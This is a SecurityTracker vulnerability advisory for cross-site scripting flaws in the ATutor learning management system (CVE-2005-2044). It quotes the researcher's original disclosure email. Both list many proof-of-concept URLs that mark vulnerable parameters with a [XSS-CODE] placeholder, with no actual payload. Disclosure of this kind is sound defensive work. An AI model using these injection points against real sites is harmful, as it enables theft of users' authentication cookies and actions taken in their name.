ATutor Input Validation Bugs in Several Scripts Permit Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1014216
|
|
SecurityTracker URL: http://securitytracker.com/id?1014216
|
|
CVE Reference: CVE-2005-2044
(Links to External Site)
|
Updated: Jul 17 2008
|
Original Entry Date: Jun 16 2005
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
Version(s): 1.4.3, 1.5 RC 1
|
Description: Lostmon reported a vulnerability in ATutor. A remote user can conduct cross-site scripting attacks.
Several scripts do not properly validate user-supplied input. A remote user can create a specially crafted URL that, when loaded
by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from
the site running the ATutor software and will run in the security context of that site. As a result, the code will be able to access
the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by
the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs
are provided:
http://[target]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]
http://[target]/ATutor/contact.php?subject=[XSS-CODE]
http://[target]/atutor/conten
t.php?cid=323[XSS-CODE]
http://[target]/atutor/inbox/send_message.php?l=1[XSS-CODE]
http://[target]/atutor/search.php?search=10[XSS-CODE]
&words=kk&include=all&fin
d_in=this&display_as=pages
&search=Search
http://[target]/ATutor/search.php?search=1&words=aa[XSS-CODE]
&include=one&find_in=all&display_as=summaries&search=Search
#search_results
http://[target]/ATutor/search.php?search=1&words=aa
&include=one[XSS-CODE]&find_in=all&display_as=
summaries&search=Search#search_results
http://
[target]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all[XSS-CODE]&display_as=
summaries&search=Search#search_results
http://[target]/ATutor/search.php?
search=1&words=aa
&include=one&find_in=all&display_as=[XSS-CODE]
summaries&search=Search#search_results
http://[target]/ATutor/search.php?search=1&words=aa
&include
=one&find_in=all&display_as=summaries&search
=[XSS-CODE]Search#search_results
http://[target]/ATutor/inbox/index.php?view=1[XSS-CODE]
http://[target]/ATutor/tile.p
hp?query=yy
&field=technicalFormat&submit=Search[XSS-CODE]
http://[target]/ATutor/tile.php?query=[XSS-CODE]
&field=technicalFormat&submit=Search
http://[target]/A
Tutor/tile.php?query=yy&
field=technicalFormat[XSS-CODE]&submit=Search
http://[target]/ATutor/forum/subscribe_forum.php?
fid=2&us=1[XSS-CODE]
http://[target]/ATut
or/directory.php?roles%5B%5D=[XSS-CODE]
1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter
http://[target]/ATutor/directory.php?roles%5B%5D=1&roles%5
B%5D=[XSS-COD
E]2&roles%5B%5D=3&status=1&submit=Filter
http://[target]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter
http://[t
arget]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter
http://[target]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%
5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]
http://[target]/ATutor/directory.php?roles%5B%5D=1&status=
2&reset_filter=Reset+Filter[XSS-CODE]
http://[target
]/ATutor/directory.php?roles[]=1[XSS-CODE]
Some of the exploit URLs require that the target user be authenticated to the system.
The
vendor was notified on June 14, 2005.
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
ATutor software, access data recently submitted by the target user via web form to the site, or take actions on the site acting
as the target user.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.atutor.ca/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Lostmon <lostmon@gmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 16 Jun 2005 04:37:12 +0200
From: Lostmon <lostmon@gmail.com>
Subject: ATutor multiple variable Cross site scripting
|
################################################
ATutor multiple variable Cross site scripting
vendor url:http://www.atutor.ca/atutor/download.php
ADVISORE:http://lostmon.blogspot.com/2005/06/
atutor-multiple-variable-cross-site.html
VENDOR NOTIFY: YES EXPLOIT AVAILABLE: YES
################################################
ATutor is an Open Source Web-based Learning Content
Management System (LCMS) designed with accessibility
and adaptability in mind.
ATutor contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate multiple variables upon submission
to multiple scripts. script.This could allow a user to
create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
###########
versions:
###########
ATutor 1.4.3 vulnerable
ATutor 1.5 RC 1 vulnerable
#############
solution
#############
no solution was available at this time
##############
timeline
##############
discovered: 10-06-2005
vendor notify: 14-06-2005 (webform)
disclosure: 16-06-2005
##################
Proof of concepts
##################
http://[VICTIM]/ATutor/browse.php?cat=0&show_course=1[XSS-CODE]
http://[VICTIM]/ATutor/contact.php?subject=[XSS-CODE]
http://[VICTIM]/atutor/content.php?cid=323[XSS-CODE]
http://[VICTIM]/atutor/inbox/send_message.php?l=1[XSS-CODE]
http://[VICTIM]/atutor/search.php?search=10[XSS-CODE]
&words=kk&include=all&find_in=this&display_as=pages
&search=Search
http://[VICTIM]/ATutor/search.php?search=1&words=aa[XSS-CODE]
&include=one&find_in=all&display_as=summaries&search=Search
#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one[XSS-CODE]&find_in=all&display_as=
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all[XSS-CODE]&display_as=
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=[XSS-CODE]
summaries&search=Search#search_results
http://[VICTIM]/ATutor/search.php?search=1&words=aa
&include=one&find_in=all&display_as=summaries&search
=[XSS-CODE]Search#search_results
http://[VICTIM]/ATutor/inbox/index.php?view=1[XSS-CODE]
http://[VICTIM]/ATutor/tile.php?query=yy
&field=technicalFormat&submit=Search[XSS-CODE]
http://[VICTIM]/ATutor/tile.php?query=[XSS-CODE]
&field=technicalFormat&submit=Search
http://[VICTIM]/ATutor/tile.php?query=yy&
field=technicalFormat[XSS-CODE]&submit=Search
http://[VICTIM]/ATutor/forum/subscribe_forum.php?
fid=2&us=1[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=[XSS-CODE]
1&roles%5B%5D=2&roles%5B%5D=3&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5
B%5D=[XSS-CODE]2&roles%5B%5D=3&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3[XSS-CODE]&status=1&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1[XSS-CODE]&submit=Filter
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&roles%5B
%5D=2&roles%5B%5D=3&status=1&submit=Filter[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles%5B%5D=1&status=
2&reset_filter=Reset+Filter[XSS-CODE]
http://[VICTIM]/ATutor/directory.php?roles[]=1[XSS-CODE]
for exploting some flaws , need a client login.
Others scripts and others variables are vulnerable
to the same style attack.
############### €nd ##############
Thnx to estrella to be my ligth
-- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/
-- La curiosidad es lo que hace mover la mente....
|
|
